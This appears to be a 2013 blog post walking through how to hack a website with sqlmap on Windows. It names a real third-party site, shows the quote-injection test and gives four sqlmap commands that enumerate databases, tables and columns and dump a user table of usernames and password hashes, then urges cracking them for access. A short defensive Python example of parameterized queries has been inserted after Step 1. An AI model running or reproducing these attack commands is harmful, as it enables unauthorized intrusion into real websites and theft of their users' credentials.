Saturday, August 17, 2013

HOW TO HACK A WEBSITE USING "SQLMAP" ON WINDOWS


In this tutorial, we will learn how to find a vulnerable link in a website, exploit that link by SQL injection and take total control over any website. This includes access to the usernames and passwords database, defacing it, address forwarding and much more. This is the most powerful attack against any website and can create a world-wide mess if done for evil purposes.

So what are we waiting for? Let's begin...



Step 1 :

======

Find a SQL-injectable website to hack...

Simply put (') after the site URL, and if you get a syntax error, the site is vulnerable...

I found a site to give you a very clear example of the tool...

http://www.areyoureadytoorder.co.uk/review.php?id=280'

The site is vulnerable so let's hack it...
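
Why the (') test produces a syntax error, and what the fix looks like on the server side. This is an added example, not part of the original post: it uses Python's sqlite3 with a constructed in-memory "review" table standing in for the database behind review.php, and the function names are made up for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the table behind review.php (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE review (id INTEGER PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO review VALUES (?, ?)",
                   [(280, "Great food"), (281, "Slow delivery")])
    return db

def fetch_vulnerable(db, raw_id):
    """'Before': the request value is pasted straight into the SQL text."""
    sql = "SELECT body FROM review WHERE id = " + raw_id
    try:
        return ("ok", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # The stray quote reached the SQL parser: this is the syntax error
        # from Step 1, and the sign that input is being treated as code.
        return ("sql_error", str(exc))

def fetch_hardened(db, raw_id):
    """'After': validate the expected type, then bind the value as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        # Reject without echoing database errors back to the client.
        return ("rejected", [])
    rows = db.execute("SELECT body FROM review WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return ("ok", rows)

if __name__ == "__main__":
    db = make_db()
    for value in ("280", "280'"):
        print(repr(value), "vulnerable:", fetch_vulnerable(db, value))
        print(repr(value), "hardened:  ", fetch_hardened(db, value))
```

With the bound parameter the quote never reaches the SQL parser, so the request is either answered normally or rejected and no database error is exposed.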




Step 2 :

======


In this tutorial I will use Windows, so put this command in cmd...

Start sqlmap and type this command into it...

I made a directory named sqlmap in the Python folder, so this is...

+++++++++
command 1:
+++++++++        


                    python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --dbs



Here, -u = the link of your SQL-injectable website...

      --dbs = tells the program to dump the database...


Step 3 : 
=====

So after getting the database name, type this command in the box to dump the tables...

++++++++
command 2 :
++++++++


                 python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --tables -D aytro






Step 4 : 
=====

Now you want the columns that the database has, so let's dump the columns...

+++++++++
command 3 :
+++++++++

                  python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user




Step 5 : 
=====

So now you have the tables and columns of the website database... now it's time to dump the usernames and passwords from the website...


Put in this command to get the usernames and passwords...

+++++++++
command 4 :
+++++++++

                     python sqlmap/sqlmap.py -u http://www.areyoureadytoorder.co.uk/review.php?id=280 --columns -D aytro -T ay_user --dump




SO HERE ARE THE USERNAMES AND PASSCODES TO ACCESS, BUT THE PASSWORDS ARE HASHED, SO YOU NEED TO CRACK THEM; AFTER THAT YOU WILL HAVE ACCESS TO THE SITE...



HOPE YOU GUYS ENJOY THE TUTORIAL...
